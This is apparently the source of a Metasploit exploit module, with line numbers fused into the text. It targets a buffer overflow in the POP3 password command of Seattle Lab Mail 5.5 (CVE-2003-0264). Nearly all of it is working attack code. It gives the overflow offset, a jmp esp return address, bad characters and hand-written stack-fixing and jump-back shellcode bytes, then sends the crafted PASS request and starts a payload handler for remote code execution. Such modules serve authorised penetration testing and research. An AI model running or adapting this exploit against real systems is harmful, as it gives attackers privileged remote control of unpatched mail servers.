Path: blob/master/modules/exploits/windows/pop3/seattlelab_pass.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',15'Description' => %q{16There exists an unauthenticated buffer overflow vulnerability17in the POP3 server of Seattle Lab Mail 5.5 when sending a password18with excessive length.1920Successful exploitation should not crash either the21service or the server; however, after initial use the22port cannot be reused for successive exploitation until23the service has been restarted. Consider using a command24execution payload following the bind shell to restart25the service if you need to reuse the same port.2627The overflow appears to occur in the debugging/error reporting28section of the slmail.exe executable, and there are multiple29offsets that will lead to successful exploitation. This exploit30uses 2606, the offset that creates the smallest overall payload.31The other offset is 4654.3233The return address is overwritten with a "jmp esp" call from the34application library SLMFC.DLL found in %SYSTEM%\system32\. This35return address works against all version of Windows and service packs.3637The last modification date on the library is dated 06/02/99. Assuming38that the code where the overflow occurs has not changed in some time,39prior version of SLMail may also be vulnerable with this exploit. The40author has not been able to acquire older versions of SLMail for41testing purposes. Please let us know if you were able to get this42exploit working against other SLMail versions.43},44'Author' => 'stinko',45'License' => MSF_LICENSE,46'References' => [47['CVE', '2003-0264'],48['OSVDB', '11975'],49['BID', '7519'],50],51'Privileged' => true,52'DefaultOptions' => {53'EXITFUNC' => 'thread',54},55'Payload' => {56'Space' => 600,57'BadChars' => "\x00\x0a\x0d\x20",58'MinNops' => 100,59},60'Platform' => 'win',61'Targets' => [62['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 } ]63],64'DisclosureDate' => '2003-05-07',65'DefaultTarget' => 0,66'Notes' => {67'Reliability' => UNKNOWN_RELIABILITY,68'Stability' => UNKNOWN_STABILITY,69'SideEffects' => UNKNOWN_SIDE_EFFECTS70}71)72)7374register_options(75[76Opt::RPORT(110)77]78)79end8081def exploit82connect8384print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")8586banner = sock.get_once || ''87if banner !~ /^\+OK POP3 server (.*) ready/88print_error("POP3 server does not appear to be running")89return90end9192sock.put("USER #{rand_text_alphanumeric(10)}\r\n")93banner = sock.get_once94if banner !~ /^\+OK (.*) welcome here/95print_error("POP3 server rejected username")96return97end9899request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length)100request << payload.encoded101request << [target.ret].pack('V')102request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack103request << "\xe9\xcb\xfd\xff\xff" # go back 560 bytes104request << rand_text_alphanumeric(512) # cruft105request << "\r\n"106107sock.put(request)108109handler110disconnect111end112end113114115